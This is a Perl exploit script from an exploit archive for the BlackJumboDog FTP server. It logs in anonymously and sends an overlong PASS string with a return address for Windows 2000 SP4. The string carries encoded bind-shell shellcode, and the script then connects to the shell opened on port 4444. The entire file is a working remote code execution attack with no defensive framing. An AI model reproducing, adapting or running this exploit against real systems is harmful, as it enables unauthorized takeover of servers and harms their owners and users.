#!/usr/bin/perl # # blackJumboDog Exploit code by Tal zeltzer # use strict; use IO::Socket::INET; usage() unless(@ARGV == 2); my $host = shift(@ARGV); my $port = shift(@ARGV); # win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com my $shellcode = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85". "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19". "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05". "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0". "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74". "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15". "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14". "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53". "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce". "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf". "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb". "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18". "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6". "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16". "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f". "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c". "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18". "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f". "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8". "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e". "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f". "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27". "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2". "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a". "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port); $socket or die "Cannot connect to host!\n"; print "[+] Connected to host\r\n"; $socket->autoflush(1); #receive banner my $repcode = "220 "; my $response = recv_reply($socket,$repcode); #send USER command my $username = "anonymous"; print $socket "USER $username\r\n"; $repcode = ""; select(undef, undef, undef, 1.002); # sleep of 1.2 sec #Send PASS Command ( Evil Buffer ) # EIP At 308 # 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 ) printf "[+] Sending shellcode\r\n"; my $buf = "A"x308; $buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward $buf = $buf . "\x60\x2F\x4E\x7C"; $buf = $buf . $shellcode; print $socket "PASS $buf\r\n"; select(undef, undef, undef, 1.002); # sleep of 1.2 sec $repcode = ""; recv_reply($socket, $repcode); close($socket); system("telnet $host 4444"); exit(0); sub usage { # print usage information print "\nUsage: jumbo.pl \n - The host to connect to - The TCP port\n\n"; exit(1); } sub recv_reply { # retrieve any reply my $socket = shift; my $repcode = shift; $socket or die "Can't receive on socket\n"; my $res=""; while(<$socket>) { $res .= $_; if (/$repcode/) { last; } } return $res; } # milw0rm.com [2004-08-05]